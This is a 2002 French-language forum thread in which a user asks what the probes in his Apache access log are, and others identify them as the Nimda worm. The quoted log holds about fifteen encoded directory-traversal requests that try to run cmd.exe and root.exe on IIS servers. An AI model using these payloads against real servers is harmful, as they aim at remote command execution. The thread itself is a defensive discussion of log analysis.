ADSL-BC

par **bugs24** » 01 Avr 2002 11:45

Bonjour,

Je lisais le log de mon serveur appache quand j'ai vu ceci :

ça ressemble à une attaque mais quelqu'un pourrait-il me dire laquelle ???

j'ai enlevé le n° pour pas que la personne ne soit inquiétée, c'est surement pas sa faute :sad:

adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:45 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 296
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:45 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 296 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:47 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 294
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:47 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:48 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:48 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:50 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:50 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:52 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:52 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:54 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:54 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:56 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:56 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:58 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:34:58 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:02 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:02 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:04 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:04 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:06 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:06 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:09 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:09 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:11 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:11 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 301 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:17 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:17 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
adsl-*******.turboline.skynet.be - - [01/Apr/2002:08:35:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318 "-" "-"

merci d'avance

Vincent

par **pipo** » 01 Avr 2002 14:03

C nimda

par **Invité** » 01 Avr 2002 14:06

Nimbda attaque les serveurs apache ????

par **pipo** » 01 Avr 2002 14:13

Le 2002-04-01 14:06, Anonymous a écrit:
Nimbda attaque les serveurs apache ????

Nimda attaque le port 80... sans succès (si tu as apache)... Ce qui fait gonfler tes log's d'erreurs...

par **Eric** » 01 Avr 2002 14:37

Sous IIS aussi cela ne pose aucun problème (si tu as mis au moins tout ce qui se trouve dans windowsupdate :wink:

).

par **pipo** » 01 Avr 2002 15:10

Le 2002-04-01 14:37, Eric a écrit:
Sous IIS aussi cela ne pose aucun problème (si tu as mis au moins tout ce qui se trouve dans windowsupdate ).

Ah bon IIS ils fonts aussi serveur Web, je croyais que c'était juste un transmetteur de virus moi...

par **bugs24** » 01 Avr 2002 15:55

dites,

c juste une idée ou Nimda attaque dur ces jours-ci ?

paske plusieurs attaques par jour sur un seveur perso non référencé, c beaucoup ...

Entre ( ) ça me serait jamais venu à l'idée de mettre un IIS à la maison :smile:

LOL

PS : comment puis-je prévenir un user ADSL skynet qu'il a Nimda à partir de son "adsl-******.turboline.skynet.be" ?

par **Xavier** » 01 Avr 2002 16:52

Le 2002-04-01 15:55, bugs24 a écrit:
dites,

c juste une idée ou Nimda attaque dur ces jours-ci ?

paske plusieurs attaques par jour sur un seveur perso non référencé, c beaucoup ...

Entre ( ) ça me serait jamais venu à l'idée de mettre un IIS à la maison LOL

PS : comment puis-je prévenir un user ADSL skynet qu'il a Nimda à partir de son "adsl-******.turboline.skynet.be" ?

Via un chti mail a skynet...Si ils sont coherent avec eux meme, ils devraient faire suivre... ou alors arreter de faire chier en bloquant des port sous des pretexte de sécuriter!

par **Bzzz** » 01 Avr 2002 18:27

Le 2002-04-01 15:55, bugs24 a écrit:
dites,

c juste une idée ou Nimda attaque dur ces jours-ci ?

paske plusieurs attaques par jour sur un seveur perso non référencé, c beaucoup ...

Entre ( ) ça me serait jamais venu à l'idée de mettre un IIS à la maison LOL

PS : comment puis-je prévenir un user ADSL skynet qu'il a Nimda à partir de son "adsl-******.turboline.skynet.be" ?

... Idem +/- 40 par jour ...

J'ai aussi le sentiment que cela avait été mieux, mais ce n'est que supposition, je n'ai pas gardé de stats précises.

Comme le dit très justement Xavier, j'espére que Sky ne va pas
nous em***** en fermant des ports supplémentaires, y'en a mare
des ports fermés.

Quand à le signaler à Sky, je suis pas convaincu que cela sert
à grand chose. Si ils le voulaient, ce pb serait réglé depuis longtemps ( du moins pour leurs abonnés ).

ADSL-BC

déchiffrer ce log

Qui est en ligne ?